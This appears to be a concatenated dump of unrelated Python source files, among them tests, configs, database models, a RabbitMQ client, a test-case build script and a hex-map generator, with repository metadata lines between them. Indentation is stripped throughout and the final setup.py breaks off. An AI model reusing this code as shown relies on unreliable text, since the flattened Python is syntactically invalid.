o = apply_message(s.state, mk_hash_setting_message(sha3(str(i))))
if i % 100 == 0:
print("Set %d" % i)
print("Testing reads")
s.state.block_number = 1000
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(999)) == sha3(str(999))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(998)) == sha3(str(998))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(744)) == sha3(str(744))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(743)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(1000)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(1001)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(513)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(512)) == sha3(str(512))
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(511)) == b'\x00' * 32
assert s.send(tester.k0, blockhash_addr, 0, encode_int32(256)) == sha3(str(256))
print("Tests passed!")
print("EVM code: 0x%s" % encode_hex(s.state.get_code(blockhash_addr)))
| 2.078125 | 2 |
django_docutils/lib/tests/test_utils.py | tony/django-docutils | 10 | 12769695 | from django_docutils.lib.utils import chop_after_docinfo, chop_after_title
def test_chop_after_title():
content = """=============================================
Learn JavaScript for free: The best resources
=============================================
first section
-------------
some content
""".strip()
result = chop_after_title(content)
expected = """
first section
-------------
some content""".strip()
assert result == expected
def test_chop_after_docinfo():
before = """
===========
Content ok!
===========
:programming_languages: javascript
:topics: webpack
:Created: 2017-07-30
:Author: tony
more text
first section
-------------
some content
""".strip()
after = """
more text
first section
-------------
some content
""".strip()
assert chop_after_docinfo(before) == after
# test docinfo handles spaces in values
assert (
chop_after_docinfo(
source="""
==============
Document title
==============
-----------------
Document subtitle
-----------------
:Title: Overridden Title
:Subtitle: Overridden Subtitle
Content
-------
hi
""".strip()
)
== """
Content
-------
hi""".strip()
)
| 2.421875 | 2 |
example_config.py | ff781/PFERD | 0 | 12769696 | <reponame>ff781/PFERD
import argparse
from pathlib import Path, PurePath
from PFERD import Pferd
from PFERD.ilias import IliasElementType
from PFERD.transform import (attempt, do, glob, keep, move, move_dir,
optionally, re_move, re_rename)
tf_ss_2020_numerik = attempt(
re_move(r"Übungsblätter/(\d+)\. Übungsblatt/.*", "Blätter/Blatt_{1:0>2}.pdf"),
keep,
)
tf_ss_2020_db = attempt(
move_dir("Begrüßungsvideo/", "Vorlesung/Videos/"),
do(
move_dir("Vorlesungsmaterial/Vorlesungsvideos/", "Vorlesung/Videos/"),
optionally(re_rename("(.*).m4v.mp4", "{1}.mp4")),
optionally(re_rename("(?i)dbs-(.+)", "{1}")),
),
move_dir("Vorlesungsmaterial/", "Vorlesung/"),
keep,
)
tf_ss_2020_rechnernetze = attempt(
re_move(r"Vorlesungsmaterial/.*/(.+?)\.mp4", "Vorlesung/Videos/{1}.mp4"),
move_dir("Vorlesungsmaterial/", "Vorlesung/"),
keep,
)
tf_ss_2020_sicherheit = attempt(
move_dir("Vorlesungsvideos/", "Vorlesung/Videos/"),
move_dir("Übungsvideos/", "Übung/Videos/"),
re_move(r"VL(.*)\.pdf", "Vorlesung/{1}.pdf"),
re_move(r"Übungsblatt (\d+)\.pdf", "Blätter/Blatt_{1:0>2}.pdf"),
move("Chiffrat.txt", "Blätter/Blatt_01_Chiffrat.txt"),
keep,
)
tf_ss_2020_pg = attempt(
move_dir("Vorlesungsaufzeichnungen/", "Vorlesung/Videos/"),
move_dir("Vorlesungsmaterial/", "Vorlesung/"),
re_move(r"Übungen/uebungsblatt(\d+).pdf", "Blätter/Blatt_{1:0>2}.pdf"),
keep,
)
def df_ss_2020_or1(path: PurePath, _type: IliasElementType) -> bool:
if glob("Tutorien/")(path):
return True
if glob("Tutorien/Tutorium 10, dienstags 15:45 Uhr/")(path):
return True
if glob("Tutorien/*")(path):
return False
return True
tf_ss_2020_or1 = attempt(
move_dir("Vorlesung/Unbeschriebene Folien/", "Vorlesung/Folien/"),
move_dir("Video zur Organisation/", "Vorlesung/Videos/"),
keep,
)
def main() -> None:
parser = argparse.ArgumentParser()
parser.add_argument("--test-run", action="store_true")
parser.add_argument("synchronizers", nargs="*")
args = parser.parse_args()
pferd = Pferd(Path(__file__).parent, test_run=args.test_run)
pferd.enable_logging()
if not args.synchronizers or "numerik" in args.synchronizers:
pferd.ilias_kit(
target="Numerik",
course_id="1083036",
transform=tf_ss_2020_numerik,
cookies="ilias_cookies.txt",
)
if not args.synchronizers or "db" in args.synchronizers:
pferd.ilias_kit(
target="DB",
course_id="1101554",
transform=tf_ss_2020_db,
cookies="ilias_cookies.txt",
)
if not args.synchronizers or "rechnernetze" in args.synchronizers:
pferd.ilias_kit(
target="Rechnernetze",
course_id="1099996",
transform=tf_ss_2020_rechnernetze,
cookies="ilias_cookies.txt",
)
if not args.synchronizers or "sicherheit" in args.synchronizers:
pferd.ilias_kit(
target="Sicherheit",
course_id="1101980",
transform=tf_ss_2020_sicherheit,
cookies="ilias_cookies.txt",
)
if not args.synchronizers or "pg" in args.synchronizers:
pferd.ilias_kit(
target="PG",
course_id="1106095",
transform=tf_ss_2020_pg,
cookies="ilias_cookies.txt",
)
if not args.synchronizers or "or1" in args.synchronizers:
pferd.ilias_kit(
target="OR1",
course_id="1105941",
dir_filter=df_ss_2020_or1,
transform=tf_ss_2020_or1,
cookies="ilias_cookies.txt",
)
# Prints a summary listing all new, modified or deleted files
pferd.print_summary()
if __name__ == "__main__":
main()
| 2.125 | 2 |
warehouse/packaging/models.py | domenkozar/warehouse | 0 | 12769697 | <reponame>domenkozar/warehouse
# Copyright 2013 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals
from collections import namedtuple
from six.moves import urllib_parse
from sqlalchemy.sql import select, func
from warehouse import models
from warehouse.packaging.tables import (
packages, releases, release_files, description_urls, journals,
)
Project = namedtuple("Project", ["name"])
FileURL = namedtuple("FileURL", ["filename", "url"])
class Model(models.Model):
def all_projects(self):
query = select([packages.c.name]).order_by(func.lower(packages.c.name))
with self.engine.connect() as conn:
return [Project(r["name"]) for r in conn.execute(query)]
def get_project(self, name):
query = (
select([packages.c.name])
.where(
packages.c.normalized_name == func.lower(
func.regexp_replace(name, "_", "-", "ig"),
)
)
)
with self.engine.connect() as conn:
result = conn.execute(query).scalar()
if result is not None:
return Project(result)
def get_hosting_mode(self, name):
query = (
select([packages.c.hosting_mode])
.where(packages.c.name == name)
)
with self.engine.connect() as conn:
return conn.execute(query).scalar()
def get_release_urls(self, name):
query = (
select([
releases.c.version,
releases.c.home_page,
releases.c.download_url,
])
.where(releases.c.name == name)
.order_by(releases.c.version.desc())
)
with self.engine.connect() as conn:
return {
r["version"]: (r["home_page"], r["download_url"])
for r in conn.execute(query)
}
def get_external_urls(self, name):
query = (
select([description_urls.c.url], distinct=description_urls.c.url)
.where(description_urls.c.name == name)
.order_by(
description_urls.c.url,
)
)
with self.engine.connect() as conn:
return [r["url"] for r in conn.execute(query)]
def get_file_urls(self, name):
query = (
select([
release_files.c.name,
release_files.c.filename,
release_files.c.python_version,
release_files.c.md5_digest,
])
.where(release_files.c.name == name)
.order_by(release_files.c.filename.desc())
)
with self.engine.connect() as conn:
results = conn.execute(query)
return [
FileURL(
filename=r["filename"],
url=urllib_parse.urljoin(
"/".join([
"../../packages",
r["python_version"],
r["name"][0],
r["name"],
r["filename"],
]),
"#md5={}".format(r["md5_digest"]),
),
)
for r in results
]
def get_project_for_filename(self, filename):
query = (
select([release_files.c.name])
.where(release_files.c.filename == filename)
)
with self.engine.connect() as conn:
return Project(conn.execute(query).scalar())
def get_filename_md5(self, filename):
query = (
select([release_files.c.md5_digest])
.where(release_files.c.filename == filename)
)
with self.engine.connect() as conn:
return conn.execute(query).scalar()
def get_last_serial(self, name=None):
query = select([func.max(journals.c.id)])
if name is not None:
query = query.where(journals.c.name == name)
with self.engine.connect() as conn:
return conn.execute(query).scalar()
| 2.125 | 2 |
tests/test_docstrings.py | pquinterome/https-github.com-Radiomics-pyradiomics | 1 | 12769698 | # to run this test, from directory above:
# setenv PYTHONPATH /path/to/pyradiomics/radiomics
# nosetests --nocapture -v tests/test_docstrings.py
import logging
from nose_parameterized import parameterized
import six
from radiomics import getFeatureClasses
from testUtils import custom_name_func
featureClasses = getFeatureClasses()
def setup_module(module):
# runs before anything in this file
print("") # this is to get a newline after the dots
return
class TestDocStrings:
def setup(self):
# setup before each test method
print("") # this is to get a newline after the dots
@classmethod
def setup_class(self):
# called before any methods in this class
print("") # this is to get a newline after the dots
@classmethod
def teardown_class(self):
# run after any methods in this class
print("") # this is to get a newline after the dots
def generate_scenarios():
global featureClasses
for featureClassName, featureClass in six.iteritems(featureClasses):
logging.info('generate_scenarios %s', featureClassName)
doc = featureClass.__doc__
assert(doc is not None)
featureNames = featureClass.getFeatureNames()
for f in featureNames:
yield (featureClassName, f)
@parameterized.expand(generate_scenarios(), testcase_func_name=custom_name_func)
def test_class(self, featureClassName, featureName):
global featureClasses
logging.info('%s', featureName)
features = featureClasses[featureClassName]
doc = getattr(features, "get%sFeatureValue" % featureName).__doc__
logging.info('%s', doc)
assert(doc is not None)
| 2.28125 | 2 |
server/fm_server/device/rabbitmq_messages.py | nstoik/farm_monitor | 1 | 12769699 | """Device RabbitMQ messages module."""
import json
import logging
import time
import pika
from fm_server.settings import get_config
LOGGER = logging.getLogger("fm.device.rabbitmq")
def get_connection(config=None):
"""This method connects to RabbitMQ, returning the connection handle.
When the connection is established, the on_connection_open method
will be invoked by pika.
:rtype: pika.SelectConnection
"""
LOGGER.info("Connecting to RabbitMQ")
if not config:
config = get_config()
user = config.RABBITMQ_USER
password = config.RABBITMQ_PASSWORD
virtual_host = config.RABBITMQ_VHOST
host = config.RABBITMQ_HOST
port = config.RABBITMQ_PORT
creds = pika.PlainCredentials(user, password)
params = pika.ConnectionParameters(
host=host, port=port, virtual_host=virtual_host, credentials=creds
)
return pika.BlockingConnection(parameters=params)
def send_create_message(destination="all"):
"""Send a create message to 'destination' devices."""
config = get_config()
connection = get_connection(config=config)
channel = connection.channel()
exchange_name = config.RABBITMQ_MESSAGES_EXCHANGE_NAME
exchange_type = config.RABBITMQ_MESSAGES_EXCHANGE_TYPE
channel.exchange_declare(exchange=exchange_name, exchange_type=exchange_type)
routing_key = destination + ".create"
message = {"command": "create"}
channel.basic_publish(
exchange=exchange_name,
routing_key=routing_key,
body=json.dumps(message, ensure_ascii=True),
)
LOGGER.debug(f"Sent message with key:{routing_key} to {exchange_name} exchange")
connection.close()
def get_device_status(device_id):
"""Get the device status from the heartbeat service for a given device_id."""
config = get_config()
connection = get_connection(config=config)
channel = connection.channel()
exchange_name = config.RABBITMQ_MESSAGES_EXCHANGE_NAME
exchange_type = config.RABBITMQ_MESSAGES_EXCHANGE_TYPE
channel.exchange_declare(exchange=exchange_name, exchange_type=exchange_type)
method_frame = channel.queue_declare(queue="", exclusive=True, auto_delete=True)
reply_queue = method_frame.method.queue
properties = pika.BasicProperties(
content_type="application/json", reply_to=reply_queue
)
routing_key = "_internal"
message = {"command": "device_status", "id": device_id}
channel.basic_publish(
exchange=exchange_name,
routing_key=routing_key,
body=json.dumps(message, ensure_ascii=True),
properties=properties,
)
LOGGER.info(f"Sent request for {device_id } status to {exchange_name} exchange")
attempts = 0
while attempts < 5:
# pylint: disable=unused-variable
method_frame, header_frame, body = channel.basic_get(reply_queue)
if method_frame:
connection.close()
state = str(body, "utf-8")
LOGGER.info(f"Returned status is {state}")
return state
LOGGER.debug("No return message received yet")
time.sleep(1)
attempts += 1
LOGGER.warning("No return message received for device status message request")
connection.close()
return "disconnected"
| 2.75 | 3 |
simulasi/lab0.5/pamer-saham/script.py | reiva5/struktur-data-dan-algoritma | 0 | 12769700 | <reponame>reiva5/struktur-data-dan-algoritma<filename>simulasi/lab0.5/pamer-saham/script.py
import sys
import os
import glob
cnt = 0
os.system("tcframe build")
os.system("./runner")
os.system("rm -rf tc/input")
os.system("mkdir tc/input")
for x in sorted(glob.glob("tc/*.in")):
newFileName = "tc/input/input%02d.txt" % (cnt)
command = "mv %s %s" % (x, newFileName)
os.system(command)
cnt += 1
cnt = 0
os.system("rm -rf tc/output")
os.system("mkdir tc/output")
for x in sorted(glob.glob("tc/*.out")):
newFileName = "tc/output/output%02d.txt" % (cnt)
command = "mv %s %s" % (x, newFileName)
os.system(command)
cnt += 1
| 2.15625 | 2 |
formalchemy/config.py | pombreda/formalchemy | 2 | 12769701 | # -*- coding: utf-8 -*-
import sys
from formalchemy import templates
__doc__ = """
There is two configuration settings available in a global config object.
- encoding: the global encoding used by FormAlchemy to deal with unicode. Default: utf-8
- engine: A valide :class:`~formalchemy.templates.TemplateEngine`
- date_format: Used to format date fields. Default to %Y-%d-%m
- date_edit_format: Used to retrieve field order. Default to m-d-y
Here is a simple example::
>>> from formalchemy import config
>>> config.encoding = 'iso-8859-1'
>>> config.encoding
'iso-8859-1'
>>> from formalchemy import templates
>>> config.engine = templates.TempitaEngine
There is also a convenience method to set the configuration from a config file::
>>> config.from_config({'formalchemy.encoding':'utf-8',
... 'formalchemy.engine':'mako',
... 'formalchemy.engine.options.input_encoding':'utf-8',
... 'formalchemy.engine.options.output_encoding':'utf-8',
... })
>>> config.from_config({'formalchemy.encoding':'utf-8'})
>>> config.encoding
'utf-8'
>>> isinstance(config.engine, templates.MakoEngine)
True
"""
class Config(object):
__doc__ = __doc__
__name__ = 'formalchemy.config'
__file__ = __file__
__data = dict(
encoding='utf-8',
date_format='%Y-%m-%d',
date_edit_format='m-d-y',
engine = templates.default_engine,
)
def __getattr__(self, attr):
if attr in self.__data:
return self.__data[attr]
else:
raise AttributeError('Configuration has no attribute %s' % attr)
def __setattr__(self, attr, value):
meth = getattr(self, '__set_%s' % attr, None)
if callable(meth):
meth(value)
else:
self.__data[attr] = value
def __set_engine(self, value):
if isinstance(value, templates.TemplateEngine):
self.__data['engine'] = value
else:
raise ValueError('%s is not a template engine')
def _get_config(self, config, prefix):
values = {}
config_keys = config.keys()
for k in config_keys:
if k.startswith(prefix):
v = config.pop(k)
k = k[len(prefix):]
values[k] = v
return values
def from_config(self, config, prefix='formalchemy.'):
from formalchemy import templates
engine_config = self._get_config(config, '%s.engine.options.' % prefix)
for k, v in self._get_config(config, prefix).items():
if k == 'engine':
engine = templates.__dict__.get('%sEngine' % v.title(), None)
if engine is not None:
v = engine(**engine_config)
else:
raise ValueError('%sEngine does not exist' % v.title())
self.__setattr__(k, v)
def __repr__(self):
return "<module 'formalchemy.config' from '%s' with values %s>" % (self.__file__, self.__data)
sys.modules['formalchemy.config'] = Config()
| 2.421875 | 2 |
tests/test_flask_dynamodb_sessions.py | siran/flask-dynamodb-sessions | 4 | 12769702 | import pytest
import re
from pytest_mock import mocker
import flask
import flask.sessions
from flask_dynamodb_sessions import Session
def test_session_boto_settings(mocker):
client_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
app = flask.Flask(__name__)
app.config.update(
SESSION_DYNAMODB_REGION='bogus-region',
SESSION_DYNAMODB_ENDPOINT='http://bogus:1234'
)
def create_test_app(**kwargs):
app = flask.Flask(__name__)
app.config.update(**kwargs)
Session(app)
@app.route('/test_route')
def test_route():
flask.session['x'] = 'foo'
return flask.make_response('', 200)
return app
def test_save_uses_header(mocker):
boto_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
boto_mock_instance = boto_mock()
app = create_test_app(
SESSION_DYNAMODB_USE_HEADER=True
)
mocker.spy(boto_mock, 'update_item')
response = app.test_client().get('/test_route')
# Find the session ID that was passed to update_item()
session_id = None
match = re.search("Key={'id': {'S': '(.+?)'}}", str(boto_mock_instance.update_item.call_args))
if match:
session_id = match.group(1)
assert 'X-SessionId' in response.headers
assert response.headers['X-SessionId'] == session_id
assert 'Set-Cookie' not in response.headers
def test_read_uses_header(mocker):
expected_session_id = 'foobar'
boto_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
boto_mock_instance = boto_mock()
boto_mock_instance.get_item.return_value = {'Item': {'data': ''}}
app = create_test_app(
SESSION_DYNAMODB_USE_HEADER=True
)
mocker.spy(boto_mock, 'get_item')
response = app.test_client().get('/test_route', headers={'X-SessionId': expected_session_id})
# Find the session ID that was passed to get_item()
actual_session_id = None
match = re.search("Key={'id': {'S': '(.+?)'}}", str(boto_mock_instance.get_item.call_args))
if match:
actual_session_id = match.group(1)
assert actual_session_id == expected_session_id
def test_consistent_read_default_false(mocker):
boto_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
boto_mock_instance = boto_mock()
boto_mock_instance.get_item.return_value = {'Item': {'data': ''}}
app = create_test_app(
SESSION_DYNAMODB_USE_HEADER=True
)
mocker.spy(boto_mock, 'get_item')
response = app.test_client().get('/test_route', headers={'X-SessionId': 'foo'})
# Validate ConsistentRead setting
assert 'ConsistentRead=False' in str(boto_mock_instance.get_item.call_args)
def test_consistent_read_true(mocker):
boto_mock = mocker.patch('flask_dynamodb_sessions.boto3.client')
boto_mock_instance = boto_mock()
boto_mock_instance.get_item.return_value = {'Item': {'data': ''}}
app = create_test_app(
SESSION_DYNAMODB_USE_HEADER=True,
SESSION_DYNAMODB_CONSISTENT_READ=True
)
mocker.spy(boto_mock, 'get_item')
response = app.test_client().get('/test_route', headers={'X-SessionId': 'foo'})
# Validate ConsistentRead setting
assert 'ConsistentRead=True' in str(boto_mock_instance.get_item.call_args)
| 2.09375 | 2 |
reference/apps.py | tanyong8520/tushare | 0 | 12769703 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class ReferenceConfig(AppConfig):
name = 'reference'
| 1.101563 | 1 |
ResourceStatusSystem/Service/ResourceManagementIHEPHandler.py | zhangxt-ihep/IHEPDIRAC | 0 | 12769704 | <filename>ResourceStatusSystem/Service/ResourceManagementIHEPHandler.py
''' ResourceManagementHandler
Module that allows users to access the ResourceManagementDB remotely.
'''
from DIRAC import gConfig, S_OK, gLogger
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.ResourceStatusSystem.Utilities import Synchronizer, Utils
from IHEPDIRAC.ResourceStatusSystem.DB.ResourceManagementIHEPDB import ResourceManagementIHEPDB
__RCSID__ = '$Id: $'
def initializeResourceManagementIHEPHandler( _serviceInfo ):
'''
Handler initialization, where we set the ResourceManagementDB as global db.
'''
global db
db = ResourceManagementIHEPDB()
# Regenerates DB tables if needed
db._checkTable()
syncObject = Synchronizer.Synchronizer()
gConfig.addListenerToNewVersionEvent( syncObject.sync )
return S_OK()
################################################################################
class ResourceManagementIHEPHandler( RequestHandler ):
'''
The ResourceManagementHandler exposes the DB front-end functions through a
XML-RPC server, functionalities inherited from :class:`DIRAC.Core.DISET.Reques\
tHandler.RequestHandler`
According to the ResourceManagementDB philosophy, only functions of the type:
- insert
- update
- select
- delete
are exposed. If you need anything more complicated, either look for it on the
:class:`ResourceManagementClient`, or code it yourself. This way the DB and the
Service are kept clean and tidied.
To can use this service on this way, but you MUST NOT DO IT. Use it through the
:class:`ResourceManagementClient`. If offers in the worst case as good perfor\
mance as the :class:`ResourceManagementHandler`, if not better.
>>> from DIRAC.Core.DISET.RPCClient import RPCCLient
>>> server = RPCCLient("ResourceStatus/ResourceManagement")
'''
def __init__( self, *args, **kwargs ):
super( ResourceManagementIHEPHandler, self ).__init__( *args, **kwargs )
@staticmethod
def __logResult( methodName, result ):
'''
Method that writes to log error messages
'''
if not result[ 'OK' ]:
gLogger.error( '%s%s' % ( methodName, result[ 'Message' ] ) )
@staticmethod
def setDatabase( database ):
'''
This method let us inherit from this class and overwrite the database object
without having problems with the global variables.
:Parameters:
**database** - `MySQL`
database used by this handler
:return: None
'''
global db
db = database
types_insert = [ dict, dict ]
def export_insert( self, params, meta ):
'''
This method is a bridge to access :class:`ResourceManagementDB` remotely. It
does not add neither processing nor validation. If you need to know more
about this method, you must keep reading on the database documentation.
:Parameters:
**params** - `dict`
arguments for the mysql query ( must match table columns ! ).
**meta** - `dict`
metadata for the mysql query. It must contain, at least, `table` key
with the proper table name.
:return: S_OK() || S_ERROR()
'''
gLogger.info( 'insert: %s %s' % ( params, meta ) )
res = db.insert( params, meta )
self.__logResult( 'insert', res )
return res
types_update = [ dict, dict ]
def export_update( self, params, meta ):
'''
This method is a bridge to access :class:`ResourceManagementDB` remotely. It
does not add neither processing nor validation. If you need to know more
about this method, you must keep reading on the database documentation.
:Parameters:
**params** - `dict`
arguments for the mysql query ( must match table columns ! ).
**meta** - `dict`
metadata for the mysql query. It must contain, at least, `table` key
with the proper table name.
:return: S_OK() || S_ERROR()
'''
gLogger.info( 'update: %s %s' % ( params, meta ) )
res = db.update( params, meta )
self.__logResult( 'update', res )
return res
types_select = [ dict, dict ]
def export_select( self, params, meta ):
'''
This method is a bridge to access :class:`ResourceManagementDB` remotely.
It does not add neither processing nor validation. If you need to know more\
about this method, you must keep reading on the database documentation.
:Parameters:
**params** - `dict`
arguments for the mysql query ( must match table columns ! ).
**meta** - `dict`
metadata for the mysql query. It must contain, at least, `table` key
with the proper table name.
:return: S_OK() || S_ERROR()
'''
gLogger.info( 'select: %s %s' % ( params, meta ) )
res = db.select( params, meta )
self.__logResult( 'select', res )
return res
types_delete = [ dict, dict ]
def export_delete( self, params, meta ):
'''
This method is a bridge to access :class:`ResourceManagementDB` remotely.\
It does not add neither processing nor validation. If you need to know more \
about this method, you must keep reading on the database documentation.
:Parameters:
**params** - `dict`
arguments for the mysql query ( must match table columns ! ).
**meta** - `dict`
metadata for the mysql query. It must contain, at least, `table` key
with the proper table name.
:return: S_OK() || S_ERROR()
'''
gLogger.info( 'delete: %s %s' % ( params, meta ) )
res = db.delete( params, meta )
self.__logResult( 'delete', res )
return res
types_addOrModify = [ dict, dict ]
def export_addOrModify( self, params, meta ):
'''
This method is a bridge to access :class:`ResourceManagementDB` remotely. It does
not add neither processing nor validation. If you need to know more about
this method, you must keep reading on the database documentation.
:Parameters:
**args** - `tuple`
arguments for the mysql query ( must match table columns ! ).
**kwargs** - `dict`
metadata for the mysql query. It must contain, at least, `table` key
with the proper table name.
:return: S_OK() || S_ERROR()
'''
gLogger.info( 'addOrModify: %s %s' % ( params, meta ) )
res = db.addOrModify( params, meta )
self.__logResult( 'addOrModify', res )
return res
types_addIfNotThere = [ dict, dict ]
def export_addIfNotThere( self, params, meta ):
'''
This method is a bridge to access :class:`ResourceManagementDB` remotely. It does
not add neither processing nor validation. If you need to know more about
this method, you must keep reading on the database documentation.
:Parameters:
**args** - `tuple`
arguments for the mysql query ( must match table columns ! ).
**kwargs** - `dict`
metadata for the mysql query. It must contain, at least, `table` key
with the proper table name.
:return: S_OK() || S_ERROR()
'''
gLogger.info( 'addIfNotThere: %s %s' % ( params, meta ) )
res = db.addIfNotThere( params, meta )
self.__logResult( 'addIfNotThere', res )
return res
################################################################################
#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF
| 2.203125 | 2 |
kinbot/jobs.py | rubenvdvijver/KinBot | 0 | 12769705 | ###################################################
## ##
## This file is part of the KinBot code v2.0 ##
## ##
## The contents are covered by the terms of the ##
## BSD 3-clause license included in the LICENSE ##
## file, found at the root. ##
## ##
## Copyright 2018 National Technology & ##
## Engineering Solutions of Sandia, LLC (NTESS). ##
## Under the terms of Contract DE-NA0003525 with ##
## NTESS, the U.S. Government retains certain ##
## rights to this software. ##
## ##
## Authors: ##
## <NAME> ##
## <NAME> ##
## ##
###################################################
"""
Class to keep track fo the jobs and their id's
"""
# keys: job names
# values: job PBS id
job_ids = {}
| 1.125 | 1 |
test/test_add.py | mcraig2/uplink | 0 | 12769706 | import os
import sys
import unittest
sys.path.insert(0, os.path.abspath('..'))
from uplink.add_entry import add_entry
class TestAddEntry(unittest.TestCase):
def test_one_one(self):
self.assertEqual(1 + 1, 2)
if __name__ == '__main__':
unittest.main()
| 2.25 | 2 |
pycles/pycles.py | matthewkovacs/pycles | 0 | 12769707 | """
PyCLES
Desc: This is an implementation of the Common Language Effect Size (CLES) in Python
Author: <NAME>
Date: 04/05/20
"""
import numpy as np
from scipy.stats import norm
def nonparametric_cles(a, b, half_credit=True) -> float:
"""Nonparametric solver for the common language effect size. This solves
for the probability that a random draw from `a` will be greater than a random
draw from `b` using a brute force approach.
If half_credit=True then equal values between vectors will be granted half points.
e.g.
nonparametric_cles([0, 1], [0, 0], True) >> 0.75
nonparametric_cles([0, 1], [0, 0], False) >> 0.5
nonparametric_cles([1, 1], [0, 0]) >> 1.0
nonparametric_cles([0, 0], [1, 1]) >> 0.0
"""
m = np.subtract.outer(a, b)
m = np.sign(m)
if half_credit:
m = np.where(m == 0, 0.5, m)
m = np.where(m == -1, 0, m)
return np.mean(m)
def parametric_cles(a, b):
"""Parametric solver for the common language effect size. This function
assumes that your data is normally distributed. It returns the probability
that a random draw from `a` will be greater than a random draw from `b` using
the normal cumulative distribution function."""
ma, mb = np.mean(a), np.mean(b)
sd = np.sqrt(ma**2 + mb**2)
return norm.cdf(x=0, loc=mb-ma, scale=sd)
| 3.390625 | 3 |
tests/test_importers.py | zweifisch/klar | 1 | 12769708 | import klar
class TestImporters:
def test_template_import(self):
import templates.index
expected = "<html><i>html</i></html>\n"
assert templates.index({'html': '<i>html</i>'}) == expected
def test_json_import(self):
from schemas import product
assert product['type'] == 'object'
| 2.421875 | 2 |
hex.py | funkaoshi/hexenbracken | 17 | 12769709 | <reponame>funkaoshi/hexenbracken<gh_stars>10-100
import argparse
import csv
import os
import re
import string
import sys
import jinja2
import hexmap as hm
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--format', dest='fmt', default='html',
help="Format of output: html or text")
parser.add_argument('CSV', help="The CSV file with the hex descriptions.")
parser.add_argument('Title', help="The title of this hex map.")
args = parser.parse_args(sys.argv[1:])
if args.fmt == 'html':
template_name = os.path.basename(args.CSV)[:-3] + 'html'
elif args.fmt == 'text':
template_name = 'text.txt'
# Read CSV dump of Google Docs hex map descriptions and create hexmap of
# the data.
with open(args.CSV) as csvfile:
hexmap = hm.HexMap(csv.reader(csvfile))
if args.fmt == 'stats':
print('Most referenced Hexes:')
for l, count in hexmap.reference_histogram[-10:]:
print("\t%s mentioned %d times" % (l, count))
print('Themes found in hexes:')
for l, count in hexmap.themes_histogram:
print("\t%s mentioned %d times" % (l, count))
exit(0)
# Output Data to Template
def settlementlink(m):
# Look up settlement in settlement map and create link if the settlement
# exists.
settlement = m.group(1).upper().strip()
if settlement in hexmap.settlements:
return "<a href='#{hex}' class='city-link'>{settlement}</a>".format(
settlement=settlement, hex=hexmap.settlements[settlement])
return settlement
def hex2link(text):
# Add links were appropriate
if args.fmt == 'html':
text = re.sub(r"\[\[(\d\d\d\d)\]\]",
r"<a class='hex-link' href='#\1'>\1</a>",
text)
text = re.sub(r"\[\[(.*?)\]\]", settlementlink, text)
else:
# Convert link short-hand to plain text.
text = re.sub(r"\[\[(.*?)\]\]", r"\1", text)
return text
def getreferences(h):
# return references for this hex.
if h in hexmap.references:
return ', '.join("<a class='hex-link' href='#%s'>%s</a>" % (l, l)
for l in sorted(hexmap.references[h]))
return ''
def coordinates(location):
return int(location[:2]), int(location[2:])
last_hex = sorted(hexmap.hexes.keys())[-1]
max_x, max_y = coordinates(last_hex)
def nw(location):
x, y = coordinates(location)
if x % 2 == 1:
y -= 1
x -= 1
return '' if x <= 0 or y <= 0 else "%02d%02d" % (x, y)
def ne(location):
x, y = coordinates(location)
if x % 2 == 1:
y -= 1
x += 1
return '' if x >= max_x or y <= 0 else "%02d%02d" % (x, y)
def se(location):
x, y = coordinates(location)
if x % 2 == 0:
y += 1
x += 1
return '' if x >= max_x or y >= max_y else "%02d%02d" % (x, y)
def sw(location):
x, y = coordinates(location)
if x % 2 ==1:
y += 1
x -= 1
return '' if x <= 0 or y >= max_y else "%02d%02d" % (x, y)
def process(description):
# Fix some poor grammar / punctuation
description = description.strip()
if description[-1] not in string.punctuation:
description = description + '.'
if description[0].islower():
description = description.capitalize()
description = hex2link(description)
return description
env = jinja2.Environment(loader=jinja2.FileSystemLoader('templates'))
env.filters['process'] = process
env.filters['references'] = getreferences
env.filters['nw'] = nw
env.filters['ne'] = ne
env.filters['sw'] = sw
env.filters['se'] = se
template = env.get_template(template_name)
context = {
'hexes': sorted(hexmap.hexes.items()),
'authors': ", ".join("%s (%s)" % (author, count)
for author, count in hexmap.author_histogram.most_common()),
'references': hexmap.references,
'title': args.Title
}
print(template.render(**context))
| 3.125 | 3 |
setup.py | house-of-vanity/homebank-wui | 0 | 12769710 | #!/usr/bin/env python
try:
from debian.changelog import Changelog
except ImportError:
class Changelog(object):
def __init__(self, _):
pass
def get_version(self):
return '0.0.0'
from os import environ
from os.path import abspath, dirname, join
from setuptools import setup, find_packages
here = abspath(dirname(__file__))
changelog = join(here, 'debian/changelog')
requirements = open(join(here, 'requires.txt')).readlines()
dev_requirements = open(join(here, 'dev_requires.txt')).readlines()
additional = {}
# debhelper setup FAKEROOTKEY variable
if 'FAKEROOTKEY' not in environ:
additional['entry_points'] = {'console_scripts': [
'homebank-web = homebank.cli:manage'
]}
requirements.extend(dev_requirements)
setup(
name='homebank-wui',
version=str(Changelog(open(changelog)).get_version()),
description='Web User Interface for Homebank',
author='<NAME>',
author_email='<EMAIL>',
